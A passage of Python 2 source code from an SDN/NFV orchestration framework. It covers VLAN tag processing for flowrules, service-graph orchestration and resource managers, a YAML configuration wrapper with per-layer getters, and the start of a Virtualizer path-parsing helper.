vlan = self.__process_tag(abstract_id=match['vlan_id'])
if vlan is not None:
match['vlan_id'] = vlan
else:
self.log.error("Abort Flowrule deployment...")
return
# Process the abstract TAG in action
if 'vlan_push' in action:
self.log.debug("Process TAG: %s in action field" %
action['vlan_push'])
vlan = self.__process_tag(abstract_id=action['vlan_push'])
if vlan is not None:
action['vlan_push'] = vlan
else:
self.log.error("Abort Flowrule deployment...")
return
self.log.debug("Assemble OpenFlow flowrule from: %s" % flowrule)
self.controlAdapter.install_flowrule(infra.id, match, action)
self.log.info("Flowrule deploy result: %s" %
("SUCCESS" if result else "FAILURE"))
self.log.log(VERBOSE,
"Registered VLAN IDs: %s" % pprint.pformat(self.vlan_register))
return result
def __process_tag (self, abstract_id):
"""
Generate a valid VLAN id from the raw_id data which derived from directly
an SG hop link id.
:param abstract_id: raw link id
:type abstract_id: str or int
:return: valid VLAN id
:rtype: int
"""
# Check if the abstract tag has already processed
if abstract_id in self.vlan_register:
self.log.debug("Found already register TAG ID: %s ==> %s" % (
abstract_id, self.vlan_register[abstract_id]))
return self.vlan_register[abstract_id]
# Check if the raw_id is a valid number
try:
vlan_id = int(abstract_id)
# Check if the raw_id is free
if 0 < vlan_id < 4095 and vlan_id not in self.vlan_register.itervalues():
self.vlan_register[abstract_id] = vlan_id
self.log.debug("Abstract ID is a valid not-taken VLAN ID! "
"Register %s ==> %s" % (abstract_id, vlan_id))
return vlan_id
except ValueError:
# Cant be converted to int, continue with raw_id processing
pass
trailer_num = re.search(r'\d+$', abstract_id)
# If the raw_id ends with number
if trailer_num is not None:
# Check if the trailing number is a valid VLAN id (0 and 4095 are
# reserved)
trailer_num = int(trailer_num.group()) # Get matched data from Match obj
# Check if the VLAN candidate is free
if 0 < trailer_num < 4095 and \
trailer_num not in self.vlan_register.itervalues():
self.vlan_register[abstract_id] = trailer_num
self.log.debug("Trailing number is a valid non-taken VLAN ID! "
"Register %s ==> %s..." % (abstract_id, trailer_num))
return trailer_num
# else Try to find a free VLAN
else:
self.log.debug("Detected trailing number: %s is not a valid VLAN "
"or already taken!" % trailer_num)
# No valid VLAN number has found from abstract_id, try to find a free VLAN
for vlan in xrange(1, 4094):
if vlan not in self.vlan_register.itervalues():
self.vlan_register[abstract_id] = vlan
self.log.debug("Generated and registered VLAN id %s ==> %s" %
(abstract_id, vlan))
return vlan
# For loop is exhausted
else:
log.error("No available VLAN id found!")
return None
```
#### File: escape/service/element_mgmt.py
```python
class AbstractElementManager(object):
"""
Abstract class for element management components (EM).
.. warning::
Not implemented yet!
"""
def __init__ (self):
"""
Init.
:return: None
"""
pass
class ClickManager(AbstractElementManager):
"""
Manager class for specific VNF management based on Clicky.
.. warning::
Not implemented yet!
"""
def __init__ (self):
"""
Init.
:return: None
"""
super(ClickManager, self).__init__()
```
#### File: escape/service/sas_orchestration.py
```python
from escape.service import log as log, LAYER_NAME
from escape.service.sas_mapping import ServiceGraphMapper
from escape.util.mapping import AbstractOrchestrator, ProcessorError
from escape.util.misc import VERBOSE
from pox.lib.revent.revent import EventMixin, Event
class MissingVirtualViewEvent(Event):
"""
Event for signaling missing virtual resource view
"""
pass
class ServiceOrchestrator(AbstractOrchestrator):
"""
Main class for the actual Service Graph processing.
"""
# Default Mapper class as a fallback mapper
DEFAULT_MAPPER = ServiceGraphMapper
"""Default Mapper class as a fallback mapper"""
def __init__ (self, layer_API):
"""
Initialize main Service Layer components.
:param layer_API: layer API instance
:type layer_API: :any:`ServiceLayerAPI`
:return: None
"""
super(ServiceOrchestrator, self).__init__(layer_API=layer_API)
log.debug("Init %s" % self.__class__.__name__)
# Init SG Manager
self.sgManager = SGManager()
# Init virtual resource manager
# Listeners must be weak references in order the layer API can garbage
# collected
self.virtResManager = VirtualResourceManager()
self.virtResManager.addListeners(layer_API, weak=True)
def initiate_service_graph (self, sg, continued_request_id=False):
"""
Main function for initiating Service Graphs.
:param sg: service graph stored in NFFG instance
:type sg: :class:`NFFG`
:param continued_request_id: use explicit request id if request is
continued after a trial and error (default: False)
:type continued_request_id: str or None
:return: NF-FG description
:rtype: :class:`NFFG`
"""
log.debug("Invoke %s to initiate SG(id=%s)" %
(self.__class__.__name__, sg.id))
if not continued_request_id:
# Store newly created SG
self.sgManager.save(sg)
else:
# Use the original NFFG requested for getting the original request
nffg = self.sgManager.get(graph_id=continued_request_id)
log.info("Using original request for remapping: %s" % nffg)
# Get virtual resource info as a Virtualizer
virtual_view = self.virtResManager.virtual_view
# Notify remote visualizer about resource view of this layer if it's needed
# notify_remote_visualizer(data=virtual_view.get_resource_info(),
# id=LAYER_NAME)
# Log verbose service request
log.log(VERBOSE, "Service layer request graph:\n%s" % sg.dump())
if virtual_view is not None:
# If the request is a bare NFFG, it is probably an empty topo for domain
# deletion --> skip mapping to avoid BadInputException and forward
# topo to adaptation layer
if not continued_request_id:
if sg.is_bare():
log.warning("No valid service request (VNFs/Flowrules/SGhops) has "
"been detected in SG request! Skip orchestration in "
"layer: %s and proceed with the bare %s..." %
(LAYER_NAME, sg))
if sg.is_virtualized():
if sg.is_SBB():
log.debug("Request is a bare SingleBiSBiS representation!")
else:
log.warning("Detected virtualized representation with multiple "
"BiSBiS nodes! Currently this type of virtualization "
"is nut fully supported!")
else:
log.debug("Detected full view representation!")
# Return with the original request
return sg
else:
log.info("Request check: detected valid NFFG content!")
try:
# Run orchestration before service mapping algorithm
mapped_nffg = self.mapper.orchestrate(input_graph=sg,
resource_view=virtual_view,
continued=bool(
continued_request_id))
log.debug("SG initiation is finished by %s" % self.__class__.__name__)
return mapped_nffg
except ProcessorError as e:
log.warning("Mapping pre/post processing was unsuccessful! "
"Cause: %s" % e)
# Propagate the ProcessError to API layer
raise
else:
log.warning("Virtual view is not acquired correctly!")
# Only goes there if there is a problem
log.error("Abort orchestration process!")
class SGManager(object):
"""
Store, handle and organize Service Graphs.
Currently it just stores SGs in one central place.
"""
def __init__ (self):
"""
Init.
:return: None
"""
super(SGManager, self).__init__()
log.debug("Init %s" % self.__class__.__name__)
self._service_graphs = dict()
self._last = None
def save (self, sg):
"""
Save SG in a dict.
:param sg: Service Graph
:type sg: :class:`NFFG`
:return: computed id of given Service Graph
:rtype: int
"""
sg = sg.copy()
self._service_graphs[sg.id] = sg
self._last = sg
log.debug("SG: %s is saved by %s with id: %s" % (
sg, self.__class__.__name__, sg.id))
return sg.id
def get (self, graph_id):
"""
Return service graph with given id.
:param graph_id: graph ID
:type graph_id: int
:return: stored Service Graph
:rtype: :class:`NFFG`
"""
return self._service_graphs.get(graph_id, None)
def get_last_request (self):
"""
Return with the last saved :class:`NFFG`:
:return: last saved NFFG
:rtype: :class:`NFFG`
"""
return self._last
class VirtualResourceManager(EventMixin):
"""
Support Service Graph mapping, follow the used virtual resources according to
the Service Graph(s) in effect.
Handles object derived from :class`AbstractVirtualizer` and requested from
lower layer.
"""
# Events raised by this class
_eventMixin_events = {MissingVirtualViewEvent}
"""Events raised by this class"""
def __init__ (self):
"""
Initialize virtual resource manager.
:return: None
"""
super(VirtualResourceManager, self).__init__()
# Derived object from AbstractVirtualizer which represent the virtual
# view of this layer
self._virtual_view = None
log.debug("Init %s" % self.__class__.__name__)
@property
def virtual_view (self):
"""
Return resource info of actual layer as an :class:`NFFG
<escape.util.nffg.NFFG>` instance.
If it isn't exist requires it from Orchestration layer.
:return: resource info as a Virtualizer
:rtype: :any:`AbstractVirtualizer`
"""
log.debug("Invoke %s to get the <Virtual View>" % self.__class__.__name__)
if not self._virtual_view:
log.debug("Missing <Virtual View>! Requesting <Virtual View> now...")
self.raiseEventNoErrors(MissingVirtualViewEvent)
if self._virtual_view is not None:
log.debug("Got requested <Virtual View>: %s" % self._virtual_view)
return self._virtual_view
@virtual_view.setter
def virtual_view (self, view):
"""
Virtual view setter.
:param view: virtual view
:type view: :any:`AbstractVirtualizer`
:return: None
"""
self._virtual_view = view
@virtual_view.deleter
def virtual_view (self):
"""
Virtual view deleter.
:return: None
"""
del self._virtual_view
```
#### File: escape/util/config.py
```python
import collections
import importlib
import os
import pprint
import urlparse
from distutils.util import strtobool
import yaml
from escape.adapt import LAYER_NAME as ADAPT
from escape.infr import LAYER_NAME as INFR
from escape.orchest import LAYER_NAME as ORCHEST
from escape.service import LAYER_NAME as SERVICE
from escape.util.misc import VERBOSE, quit_with_error
from escape.util.pox_extension import POXCoreRegisterMetaClass
from pox.core import log
# Store the project root where escape.py is started in
PROJECT_ROOT = os.path.abspath(os.path.dirname(__file__) + "/../../../")
class ConfigurationError(RuntimeError):
"""
Error class for signaling errors related to configuration load, parse etc.
"""
pass
class ESCAPEConfig(object):
"""
Wrapper class for configuration to hide specialties with respect to storing,
loading, parsing and getting special data.
Contains functions for config handling and manipulation.
Should be instantiated once!
"""
# Singleton
__metaclass__ = POXCoreRegisterMetaClass
"""Singleton"""
_core_name = "CONFIG"
# Predefined layer names
LAYERS = (SERVICE, ORCHEST, ADAPT, INFR)
"""Predefined layer names"""
# Default additional config name
DEFAULT_CONFIG_FILE = "escape-config.yaml" # relative to project root
"""Path of the default config file"""
def __init__ (self, default=None):
"""
Init configuration from given data or an empty dict.
:param default: default configuration
:type default: dict
:return: None
"""
# Store copy of project root directory
self.project_root = PROJECT_ROOT
self.__initiated = False
if default:
self.__config = default
else:
self.__initialize_from_file(path=self.DEFAULT_CONFIG_FILE)
@property
def in_initiated (self):
"""
Return True if config is initiated.
:return: initiated or not
:rtype: bool
"""
return self.__initiated
def add_cfg (self, cfg):
"""
Override configuration.
:param cfg: new configuration
:type cfg: dict
:return: None
"""
if isinstance(cfg, dict) and cfg:
self.__config = cfg
@staticmethod
def _load_cfg_file (path):
"""
Load external configuration from file. Support JSON and YAML format.
:param path: file path
:type path: str
:return: loaded configuration
:rtype: dict
"""
try:
with open(path) as f:
return yaml.safe_load(f)
except IOError:
quit_with_error('Default config file: %s is not found!' % path)
except (yaml.YAMLError, Exception) as e:
quit_with_error("An error occurred when load configuration: %s" % e)
def __initialize_from_file (self, path):
"""
Initialize the config from a file given by ``path``.
:param path: config file path
:type path: str
:return: None
"""
# Load file
path = os.path.join(PROJECT_ROOT, path)
log.debug("Load default config from file: %s" % path)
self.__config = self._load_cfg_file(path=path)
def load_config (self, config=None):
"""
Load static configuration from file if it exist or leave the default intact.
.. note::
The CONFIG is updated per data under the Layer entries. This means that
the minimal amount of data have to given is the hole sequence or
collection under the appropriate key. E.g. the hole data under the
'STRATEGY' key in 'orchestration' layer.
:param config: config file name relative to pox.py (optional)
:type config: str
:return: self
:rtype: :class:`ESCAPEConfig`
"""
if self.__initiated:
return self
if config:
# Config is set directly
log.debug("Load explicitly given config file: %s" % config)
else:
# No config file has been given
log.debug("No additional configuration has been given!")
try:
if config:
# Load file
cfg = self._load_cfg_file(path=os.path.abspath(config))
# Iterate over layer config
changed = False
for layer in cfg:
if layer in self.__config:
if self.__parse_part(self.__config[layer], cfg[layer]):
changed = True
if changed:
log.info("Running configuration has been updated from file!")
except IOError:
log.error("Additional configuration file not found: %s" % config)
# Register config into pox.core to be reachable for other future
# components -not used currently
self.__initiated = True
# core.register('CONFIG', self)
log.log(VERBOSE, "Running config:\n" + pprint.pformat(self.__config))
return self
def __parse_part (self, inner_part, loaded_part):
"""
Inner function to parse and check a part of configuration and update the
stored one according the detected changes.
Uses recursion.
:param inner_part: part of inner representation of config (CONFIG)
:type inner_part: dict
:param loaded_part: part of loaded configuration (escape.config)
:type loaded_part: collections.Mapping
:return: original config is changed or not.
:rtype: bool
"""
changed = False
# If parsed part is not None or empty dict/tuple/list
if loaded_part:
# Iterating over the structure
for key, value in loaded_part.iteritems():
# If the loaded value is a dict
if isinstance(value, collections.Mapping):
# If we need to check deeper
if key in inner_part:
# Recursion
changed = self.__parse_part(inner_part[key], value)
# If no entry in CONFIG just copying
else:
# Add the new value(dict) to the inner part
inner_part[key] = value
# Config updated
changed = True
# If the loaded value is a str/tuple/list
else:
# If there is a default value for this key
if key in inner_part:
# If it is not the same
if isinstance(value, (tuple, list)):
if set(inner_part[key]) != set(value):
# Config overrided
inner_part[key] = value
changed = True
else:
if inner_part[key] != value:
# Config overrided
inner_part[key] = value
changed = True
else:
# Config updated
inner_part[key] = value
changed = True
return changed
def dump (self):
"""
Return with the entire configuration in JSON.
:return: config
:rtype: str
"""
import json
print json.dumps(self.__config, indent=4)
def is_layer_loaded (self, layer):
"""
Return the value given UNIFY's layer is loaded or not.
:param layer: layer name
:type layer: str
:return: layer condition
:rtype: bool
"""
return self.__config[layer].get('LOADED', False)
def set_layer_loaded (self, layer):
"""
Set the given layer LOADED value.
:param layer: layer name
:type layer: str
:return: None
"""
if not self.__initiated:
self.load_config()
self.__config[layer]['LOADED'] = True
def __getitem__ (self, item):
"""
Can be used the config as a dictionary: CONFIG[...]
:param item: layer key
:type item: str
:return: layer config
:rtype: dict
"""
if not isinstance(item, basestring):
raise TypeError("Unsupported operand type: Layer name must be str")
elif item not in self.LAYERS:
raise KeyError("No layer is defined with the name: %s" % item)
else:
return self.__config[item]
def __setitem__ (self, key, value):
"""
Disable explicit layer config modification.
:raise: :any:`exceptions.RuntimeError`
"""
raise RuntimeError("Explicit layer config modification is not supported!")
def __delitem__ (self, key):
"""
Disable explicit layer config deletion.
:raise: :any:`exceptions.RuntimeError`
"""
raise RuntimeError("Explicit layer config deletion is not supported!")
def get_project_root_dir (self):
"""
Return the absolute path of project dir.
:return: path of project dir
:rtype: str
"""
return self.project_root
##############################################################################
# Mapping related getters
##############################################################################
def get_mapping_enabled (self, layer):
"""
Return whether the mapping process is enabled for the ``layer`` or not.
:param layer: layer name
:type layer: str
:return: enabled value (default: True)
:rtype: bool
"""
try:
return self.__config[layer]['MAPPER']['mapping-enabled']
except KeyError:
return True
def get_mapping_config (self, layer):
"""
Return the mapping config for the ``layer`` or not.
:param layer: layer name
:type layer: str
:return: config parameters for main mapper function (default: empty dict)
:rtype: dict
"""
try:
return self.__config[layer]['MAPPER']['mapping-config']
except (KeyError, AttributeError):
return {}
def get_trial_and_error (self, layer):
"""
Return the mapping config for the ``layer`` or not.
:param layer: layer name
:type layer: str
:return: config parameters for trial_and_error function (default: false)
:rtype: bool
"""
try:
return self.__config[layer]['MAPPER']['trial_and_error']
except (KeyError, AttributeError):
return False
def get_strategy (self, layer):
"""
Return with the Strategy class of the given layer.
:param layer: layer name
:type layer: str
:return: Strategy class
:rtype: :any:`AbstractMappingStrategy`
"""
try:
return getattr(importlib.import_module(
self.__config[layer]['STRATEGY']['module']),
self.__config[layer]['STRATEGY']['class'], None)
except (KeyError, AttributeError, TypeError):
return None
def get_mapper (self, layer):
"""
Return with the Mapper class of the given layer.
:param layer: layer name
:type layer: str
:return: Mapper class
:rtype: :any:`AbstractMapper`
"""
try:
return getattr(importlib.import_module(
self.__config[layer]['MAPPER']['module']),
self.__config[layer]['MAPPER']['class'], None)
except (KeyError, AttributeError, TypeError):
return None
def get_mapping_processor (self, layer):
"""
Return with Validator class of the given layer.
:param layer: layer name
:type layer: str
:return: Validator class
:rtype: :any:`AbstractMappingDataProcessor`
"""
try:
return getattr(importlib.import_module(
self.__config[layer]['PROCESSOR']['module']),
self.__config[layer]['PROCESSOR']['class'], None)
except (KeyError, AttributeError, TypeError):
return None
def get_processor_enabled (self, layer):
"""
Return whether the mapping process is enabled for the ``layer`` or not.
:param layer: layer name
:type layer: str
:return: enabled value (default: True)
:rtype: bool
"""
try:
return self.__config[layer]['PROCESSOR']['enabled']
except KeyError:
return False
def get_threaded (self, layer):
"""
Return with the value if the mapping strategy is needed to run in
separated thread or not. If value is not defined: return False.
:param layer: layer name
:type layer: str
:return: threading value
:rtype: bool
"""
try:
return self.__config[layer]['STRATEGY']['THREADED']
except KeyError:
return False
##############################################################################
# REST_API layer getters
##############################################################################
def get_rest_api_resource_class (self, layer):
"""
"""
try:
return getattr(importlib.import_module(
self.__config['REST-API']['resources'][layer]['module']),
self.__config['REST-API']['resources'][layer]['class'], None)
except KeyError:
return None
def get_rest_api_prefix (self):
try:
return self.__config['REST-API']['prefix']
except KeyError:
return None
def get_rest_api_config (self, layer):
try:
cfg = self.__config['REST-API']['resources'][layer].copy()
del cfg['module']
del cfg['class']
return cfg
except KeyError:
return {}
def get_rest_api_host (self):
try:
return self.__config['REST-API'].get('host')
except KeyError:
return None
def get_rest_api_port (self):
try:
return self.__config['REST-API'].get('port')
except KeyError:
return None
def get_rest_api_resource_params (self, layer):
"""
Return the Cf-Or API params for agent request handler.
:return: params
:rtype: dict
"""
try:
return self.__config['REST-API']['resources'][layer]
except KeyError:
return {}
def get_rest_api_user(self):
try:
return self.__config['REST-API'].get('auth_user')
except KeyError:
return None
def get_rest_api_secret(self):
try:
return self.__config['REST-API'].get('auth_secret')
except KeyError:
return None
##############################################################################
# SERVICE layer getters
##############################################################################
def get_sas_request_delay (self):
"""
Return the default delay value for service request parsing from file.
:return: delay
:rtype: int
"""
try:
return int(
self.__config[SERVICE]['SCHEDULED_SERVICE_REQUEST_DELAY'])
except (KeyError, ValueError):
return 0
##############################################################################
# Virtualizer getters
##############################################################################
def get_api_virtualizer (self, layer):
"""
Return the type of the assigned Virtualizer.
:return: type of the Virtualizer as in :any:`VirtualizerManager`
:rtype: str
"""
try:
return self.__config['REST-API']['resources'][layer]['virtualizer_type']
except (KeyError, AttributeError, TypeError):
return None
def get_virtualizer_params (self, layer):
try:
return self.__config['REST-API']['resources'][layer][
'virtualizer_params']
except KeyError:
return {}
##############################################################################
# ADAPTATION layer getters
##############################################################################
def get_vnfm_enabled (self):
"""
Return whether the VNFM component tis enabled.
:return: VNFM is enabled or not
:rtype: bool
"""
try:
return self.__config[ADAPT]['VNFM']['enabled']
except KeyError:
return False
def get_vnfm_config (self):
"""
Return the VNFM external component configuration.
:return: VNFM config
:rtype: dict
"""
try:
params = self.__config[ADAPT]['VNFM'].copy()
return params
except KeyError:
return {}
def get_callback_config (self):
"""
Return the common callback configuration for :class:`CallbackManager`.
:return: callback manager config
:rtype: dict
"""
try:
return self.__config[ADAPT]['CALLBACK'].copy()
except KeyError:
return {}
def get_component (self, component, parent=None):
"""
Return with the class of the adaptation component.
:param component: component name
:type component: str
:param parent: define the parent of the actual component's configuration
:type parent: dict
:return: component class
"""
try:
comp = self.__config[ADAPT][component] if parent is None \
else parent[component]
return getattr(importlib.import_module(comp['module']), comp['class'])
except KeyError:
return None
def get_component_params (self, component, parent=None):
"""
Return with the initial parameters of the given component defined in CONFIG.
The param's name must be identical with the attribute name of the component
constructor.
:param component: component name
:type component: str
:param parent: define the parent of the actual component's configuration
:type parent: dict
:return: initial params
:rtype: dict
"""
try:
params = self.__config[ADAPT][component] \
if parent is None else parent[component]
except KeyError:
return {}
try:
# FIXME - what if there are no module and class???
params = params.copy()
del params['module']
del params['class']
except KeyError:
pass
return params
def get_managers (self):
"""
Return the default DomainManagers for initialization on start.
:return: list of :any:`AbstractDomainManager` names
:rtype: list
"""
try:
return self.__config[ADAPT]['MANAGERS']
except KeyError:
return ()
def get_manager_by_domain (self, domain):
"""
Return the manager configuration belongs to the given domain.
:param domain: domain name
:type domain: str
:return: domain manager config
:rtype: dict
"""
if domain in self.__config[ADAPT]:
return self.__config[ADAPT][domain]
for mgr in self.__config[ADAPT]:
if type(mgr) is not dict:
continue
if mgr.get('domain_name', None) == domain:
return mgr
def get_internal_manager (self):
"""
Return with the Manager class which is detected as the Manager of the
locally emulated Mininet-based network.
Based on the IS_INTERNAL_MANAGER attribute of the defined DomainManager
classes in the global config.
:return: local manager name(s)
:rtype: dict
"""
internal_mgrs = []
for item in self.__config[ADAPT].itervalues():
if isinstance(item, dict) and 'module' in item and 'class' in item:
try:
mgr_class = getattr(importlib.import_module(item['module']),
item['class'])
if mgr_class.IS_INTERNAL_MANAGER:
internal_mgrs.append(
item['domain_name'] if 'domain_name' in item else
mgr_class.DEFAULT_DOMAIN_NAME)
except (KeyError, AttributeError, TypeError):
return None
return internal_mgrs if internal_mgrs else None
def get_external_managers (self):
"""
Return with Manager classes which is detected as external managers.
Based on the IS_EXTERNAL_MANAGER attribute of the defined DomainManager
classes in the global config.
:return: external manager name(s)
:rtype: dict
"""
external_mgrs = []
for item in self.__config[ADAPT].itervalues():
if isinstance(item, dict) and 'module' in item and 'class' in item:
try:
mgr_class = getattr(importlib.import_module(item['module']),
item['class'])
if mgr_class.IS_EXTERNAL_MANAGER:
external_mgrs.append(
item['domain_name'] if 'domain_name' in item else
mgr_class.DEFAULT_DOMAIN_NAME)
except (KeyError, AttributeError, TypeError):
return None
return external_mgrs if external_mgrs else None
def reset_domains_after_shutdown (self):
"""
Return with the shutdown strategy to reset domain or not.
:return: reset domain after shutdown or not (default: False)
:rtype: bool
"""
try:
return self.__config[ADAPT]['deployment'][
'RESET-DOMAINS-AFTER-SHUTDOWN']
except KeyError:
return True
def clear_domains_after_shutdown (self):
"""
Return with the shutdown strategy to clear domain or not.
:return: clear domain after shutdown or not (default: True)
:rtype: bool
"""
try:
return self.__config[ADAPT]['deployment'][
'CLEAR-DOMAINS-AFTER-SHUTDOWN']
except KeyError:
return True
def reset_domains_before_install (self):
"""
Return with the pre-deploy strategy to reset domain or not.
:return: reset domain before install or not (default: False)
:rtype: bool
"""
try:
return self.__config[ADAPT]['deployment'][
'RESET-DOMAINS-BEFORE-INSTALL']
except KeyError:
return False
def rollback_on_failure (self):
"""
:return: Return whether rollback mode is enabled.
:rtype: bool
"""
try:
return self.__config[ADAPT]['deployment']['ROLLBACK-ON-FAILURE']
except KeyError:
return False
def domain_deploy_delay (self):
"""
:return: Return explicit delay value injected before deployment.
:rtype: int
"""
try:
return self.__config[ADAPT]['deployment']['DOMAIN-DEPLOY-DELAY']
except KeyError:
return 0
def flowrule_stitching (self):
try:
return self.__config[ADAPT]['deployment'][
'ENABLE-FLOWRULE-STITCHING']
except KeyError:
return True
def use_remerge_update_strategy (self):
"""
Return True if the re-merge update strategy is enabled in DoV updating
instead of using the straightforward step-by-step updating.
:return: re-merge strategy is enabled or not (default: True)
:rtype: bool
"""
try:
return self.__config[ADAPT]['DOV']['USE-REMERGE-UPDATE-STRATEGY']
except KeyError:
return True
def use_status_based_update (self):
"""
Return True if the status based update strategy is enabled.
This approach update DoV as a first step and use element status to update
the domain.
:return: status update strategy is enabled or not (default: False)
:rtype: bool
"""
try:
return self.__config[ADAPT]['DOV']['USE-STATUS-BASED-UPDATE']
except KeyError:
return False
def ensure_unique_bisbis_id (self):
"""
Return with the ID generations strategy for nodes.
If it is set, id of nodes will be generated with the domain name as a
postfix to ensure unique id globally.
:return: id generation strategy (default: False)
:rtype: bool
"""
try:
return self.__config[ADAPT]['DOV']['ENSURE-UNIQUE-BiSBiS-ID']
except KeyError:
return False
def ensure_unique_vnf_id (self):
"""
Return with the ID generations strategy for VNFs.
If it is set, id of nodes will be generated with the container BiSBiS node
id as a postfix to ensure unique id globally.
:return: id generation strategy (default: False)
:rtype: bool
"""
try:
return self.__config[ADAPT]['DOV']['ENSURE-UNIQUE-VNF-ID']
except KeyError:
return False
def one_step_update (self):
"""
:return: Return whether on-step-update is enabled.
:rtype: bool
"""
try:
return self.__config[ADAPT]['DOV']['ONE-STEP-UPDATE']
except KeyError:
return True
def no_poll_during_deployment (self):
"""
:return: Return whether polling is disabled during service deployment
:rtype: bool
"""
try:
return self.__config[ADAPT]['DOV']['NO-POLL-DURING-DEPLOYMENT']
except KeyError:
return True
def get_sdn_topology (self):
"""
Return the path of the SDN topology config file.
:return: path of topology config file
:rtype: str
"""
try:
# Project root dir relative to this module which is/must be under root
# util/escape/ext/pox/root
return os.path.abspath(
os.path.join(self.get_project_root_dir(),
self.__config[ADAPT]['SDN']['TOPOLOGY']['path']))
except KeyError:
return None
##############################################################################
# INFRASTRUCTURE layer getters
##############################################################################
def get_mn_network_opts (self):
"""
Return the optional Mininet parameters for initiation.
:return: optional constructor params (default: empty dict)
:rtype: dict
"""
try:
mn_opts = self.__config[INFR]['NETWORK-OPTS']
return mn_opts if mn_opts is not None else {}
except KeyError:
return {}
def get_mininet_topology (self):
"""
Return the Mininet topology class.
:return: topo class
"""
try:
# Project root dir relative to this module which is/must be under pox/ext
return os.path.abspath(os.path.join(self.get_project_root_dir(),
self.__config[INFR]['TOPO']))
except KeyError:
return None
def get_fallback_topology (self):
"""
Return the fallback topology class.
:return: fallback topo class
:rtype: :any::`AbstractTopology`
"""
try:
return getattr(importlib.import_module(
self.__config[INFR]['FALLBACK-TOPO']['module']),
self.__config[INFR]['FALLBACK-TOPO']['class'], None)
except KeyError:
return None
def get_clean_after_shutdown (self):
"""
Return with the value if a cleaning process need to be done or not.
:return: cleanup (default: False)
:rtype: bool
"""
try:
return strtobool(str(self.__config[INFR]['SHUTDOWN-CLEAN']))
except KeyError:
return False
def get_SAP_xterms (self):
"""
Return the value if need to initiate xtemrs assigned to SAPs.
:return: xterms
:rtype: bool
"""
try:
return self.__config[INFR]['SAP-xterms']
except (KeyError, AttributeError, TypeError):
return True
def get_nfib_enabled (self):
"""
Return if NFIB component need to be initialized.
:return: NFIB enabled or not
"""
try:
return self.__config[ORCHEST]['NFIB']['enabled']
except (KeyError, AttributeError, TypeError):
return False
def get_neo4j_host_port (self):
"""
Return the host and port values for the Neo4j server.
:return: host and port
:rtype: tuple
"""
try:
return (self.__config[ORCHEST]['NFIB'].get("host"),
self.__config[ORCHEST]['NFIB'].get("port"))
except (KeyError, AttributeError, TypeError):
return False
def get_manage_neo4j_service (self):
"""
Return the value if neo4j needs to be managed by ESCAPE.
:return: manage_neo4j_service
:rtype: bool
"""
try:
return self.__config[ORCHEST]['NFIB']['manage-neo4j-service']
except (KeyError, AttributeError, TypeError):
return False
def get_Controller_params (self):
"""
Return the additional parameter which are forwarded to the constructor of
the specific :any:`InternalControllerProxy` class during Mininet building.
:return: additional parameters as a dict (default: empty dict)
:rtype: dict
"""
try:
cfg = self.__config[INFR]['Controller']
return cfg if cfg is not None else {}
except (KeyError, AttributeError, TypeError):
return {}
def get_EE_params (self):
"""
Return the additional parameter which are forwarded to the constructor of
the :class:`mininet.node.EE` class during Mininet building.
:return: additional parameters as a dict (default: empty dict)
:rtype: dict
"""
try:
cfg = self.__config[INFR]['EE']
return cfg if cfg is not None else {}
except (KeyError, AttributeError, TypeError):
return {}
def get_Switch_params (self):
"""
Return the additional parameter which are forwarded to the constructor of
the specific :class:`mininet.node.Switch` class during Mininet building.
:return: additional parameters as a dict (default: empty dict)
:rtype: dict
"""
try:
cfg = self.__config[INFR]['Switch']
return cfg if cfg is not None else {}
except (KeyError, AttributeError, TypeError):
return {}
def get_SAP_params (self):
"""
Return the additional parameter which are forwarded to the constructor of
the :class:`mininet.node.Host` class during Mininet building.
:return: additional parameters as a dict (default: empty dict)
:rtype: dict
"""
try:
cfg = self.__config[INFR]['SAP']
return cfg if cfg is not None else {}
except (KeyError, AttributeError, TypeError):
return {}
def get_Link_params (self):
"""
Return the additional parameter which are forwarded to the constructor of
the :class:`mininet.node.Link` class during Mininet building.
:return: additional parameters as a dict (default: empty dict)
:rtype: dict
"""
try:
cfg = self.__config[INFR]['Link']
return cfg if cfg is not None else {}
except (KeyError, AttributeError, TypeError):
return {}
##############################################################################
# Visualizations layer getters
##############################################################################
def get_visualization_url (self):
"""
Return the url of the remote Visualization server.
:return: url
:rtype: str
"""
try:
return self.__config['visualization']['url']
except KeyError:
return None
def get_visualization_rpc (self):
"""
Return the url of the remote Visualization server.
:return: url
:rtype: str
"""
try:
return self.__config['visualization']['rpc']
except KeyError:
return None
def get_visualization_instance_id (self):
"""
Return the instance id of the current ESCAPEv2.
:return: url
:rtype: str
"""
try:
return self.__config['visualization']['instance_id']
except KeyError:
return None
def get_visualization_params (self):
"""
Return the instance id of the current ESCAPEv2.
:return: url
:rtype: str
"""
try:
return self.__config['visualization']['params']
except KeyError:
return {}
def get_visualization_headers (self):
"""
Return the instance id of the current ESCAPEv2.
:return: url
:rtype: str
"""
try:
return self.__config['visualization']['headers']
except KeyError:
return {}
def get_domain_url (self, domain=None):
"""
Assemble the URL of the given domain based on the global configuration.
:param domain: domain name
:type domain: str
:return: url
:rtype: str
"""
if domain is None:
host = self.get_rest_api_host()
port = self.get_rest_api_port()
prefix = self.get_rest_api_prefix()
return "http://%s:%s/%s" % (host if host else "localhost",
port if port else "",
prefix if prefix else "")
mgr = self.get_manager_by_domain(domain=domain)
if mgr is None:
log.warning("DomainManager config is not found for domain: %s" % domain)
return
try:
ra = mgr['adapters']['REMOTE']
# return os.path.join(ra['url'], ra['prefix'])
return urlparse.urljoin(ra['url'], ra['prefix'])
except KeyError:
return
# Load default config right after import
CONFIG = ESCAPEConfig()
```
#### File: escape/util/virtualizer_helper.py
```python
import ast
import logging
import re
log = logging.getLogger("virt_helper")
NF_PATH_TEMPLATE = "/virtualizer/nodes/node[id=%s]/NF_instances/node[id=%s]"
# Use ? modifier after .* to define a non-greedy matching and skip ports
NODE_NF_PATTERN = r'.*nodes/node\[id=(.*?)\]/NF_instances/node\[id=(.*?)\]'
def get_nf_from_path (path):
"""
Return the NF id from a Virtualizer path.
:param path: path
:type path: str
:return: extracted NF name
:rtype: str
"""
mapping_regex = re.compile(NODE_NF_PATTERN)
match = mapping_regex.match(path)
if match is None:
log.warning("Wrong object format: %s" % path)
return
return mapping_regex.match(path).group(2)
def get_bb_nf_from_path (path):
"""
Return the BiSBiS node and NF id from a Virtualizer path.
:param path: path
:type path: str
:return: extracted BB and NF name
:rtype: tuple
"""
mapping_regex = re.compile(NODE_NF_PATTERN)
match = mapping_regex.match(path)
if match is None:
log.warning("Wrong object format: %s" % path)
return
return mapping_regex.match(path).group(1, 2)
def detect_bb_nf_from_path (path, topo):
"""
Return the existing BiSBis and NF id referred by given path from topology.
:param path: path
:type path: str
:param topo: topology object
